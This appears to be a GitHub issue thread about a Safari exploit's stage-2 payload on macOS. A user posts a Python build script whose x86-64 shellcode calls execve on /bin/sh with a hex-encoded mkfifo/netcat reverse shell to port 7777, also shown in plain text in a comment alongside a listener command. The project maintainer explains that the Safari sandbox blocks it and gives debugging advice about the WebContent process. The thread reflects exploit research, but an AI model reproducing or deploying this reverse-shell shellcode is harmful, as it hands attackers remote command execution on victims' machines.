Questions about the shellcode

[thinkycx]

Hello, I have some questions about it . When I change the shellcode(such as run a command use execve syscall ) in the stage2, and run make.py, the safari cannot works well.

So, how to change the shellcode to run a command? When I use lldb to attach the safari and debug it , I write int 3 int the shellcode but the lldb cannot stop at 0xcc. If I use lldb to attach it , where should I set breakpoints to test the shellcode?

Wish for you reply. Thank you.

make.py

#!/usr/bin/env python

import subprocess
from string import Template

str_to_print = "Hello world from Assembly!\n"

# Generate payload
template = """
.intel_syntax noprefix
.text

.macro putchar chr
    lea rax, [rip+3f]
    mov qword ptr [rip+reentry_function], rax
    movabs rax, 0xFFFF000000000000+\chr
    ret
3:
.endmacro

.globl start
start:
    $buf
    cmp qword ptr [rip+reentry_function], 0
    je 3f
    mov rax, qword ptr [rip+reentry_function]
    jmp rax
3:
    $payload
    // Return value
    movabs rax, 0xFFFF000000000000

    ret

.data

.globl reentry_function
reentry_function:
    .quad 0
"""

payload = ""
for c in str_to_print:
    payload += "putchar %d\n"%(ord(c))

buf = '''
    xor     rax, rax
    mov     rax,0x2
    ror     rax, 0x28
    or      rax, 59
    mov rcx, rax

    xor     rdx, rdx
    mov     rbx, 0x68732f2f6e69622f
    push    rdx
    push    rbx
    push    rsp
    pop     rdi

    push    rdx
    mov     rbx, 0x632d
    push    rdx
    push    rbx
    push    rsp
    pop     rbx

    push    rdx

; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
; nc -lv 0.0.0.0 7777
    mov rcx, 0x66                    
push rcx
mov rcx, 0x2f706d742f203e20
push rcx
mov rcx, 0x3737373720363032
push rcx
mov rcx, 0x2e34342e3031322e
push rcx
mov rcx, 0x303120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx

    push rsp
    pop rcx

    push    rdx
    push    rcx
    push    rbx
    push    rdi
    push    rsp
    pop     rsi

    syscall
'''

payload = Template(template).substitute(payload=payload, buf=buf)
# payload = Template(template).substitute(payload=payload)

# Write payload
f = open("stage2_macOS.S", "w+")
f.write(payload)
f.close()

# Build payload
subprocess.check_call(['clang', '-nostdlib', '-static', 'stage2_macOS.S', '-o', 'stage2_macOS.o'])
subprocess.check_call(['gobjcopy', '-O', 'binary', 'stage2_macOS.o', 'stage2_macOS.bin'])

# Delete the generated source and binary
subprocess.check_call(['rm', 'stage2_macOS.S'])
subprocess.check_call(['rm', 'stage2_macOS.o'])

[LinusHenze]

Your shellcode won't work because Safari is sandboxed, you first need a Sandbox Escape to run shell commands. The reason why you get the crash is that the syscall fails and you're not returning a valid value from your shellcode. If you want to debug using lldb, you need to attach to WebContent, not Safari. WebContent is the Process that runs JavaScript and displays the website. Note that there will be one WebContent process for each open Tab.

[thinkycx]

Thank you very much. @LinusHenze